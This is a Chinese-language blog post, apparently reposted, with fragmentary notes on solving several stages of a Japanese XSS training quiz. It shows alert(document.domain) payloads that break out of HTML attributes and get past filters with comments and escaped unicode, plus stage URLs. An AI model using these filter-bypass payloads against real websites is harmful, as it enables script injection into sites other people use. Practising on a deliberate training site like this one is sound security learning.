XSS Challenges 记录与反思（xss是什么意思）

XSS Challenges 记录与反思（xss是什么意思）

前言

XSS Challenges是出自某位日本大佬之手，一共十九关。我没有完全记录下来，前八关基本上不怎么需要思考就能做出来的，方法也不止一种。第九关是利用UTF-7并且对ie版本号有要求也不具体操作了，网上有很多关于这个挑战的教程，想了解的可以多看看。

第十一关：

onmouseover="alert(document.domain)

aaa">

------->可以 ------>不可以

http://xss-quiz.int21h.jp/stage13_0.php?sid=ed0934fec28eadd54ad5965c980255828ad57976

也是需要ie浏览器，css特性，对ie版本有要求。第十四关：也是需要ie浏览器，css特性，对ie版本有要求，但是需要简单绕过，利用注释：

/**/

第十五关：

http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403

http://xss-quiz.int21h.jp/stage00000016.php?sid=24f62decf6b502096703efcd3f86288d23e70624

利用unicode编码绕过，同样双写\也可以用十进制：

\\74script\\76alert(document.domain);\\74/script\\76

后（反）记（思）

未完待续......

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。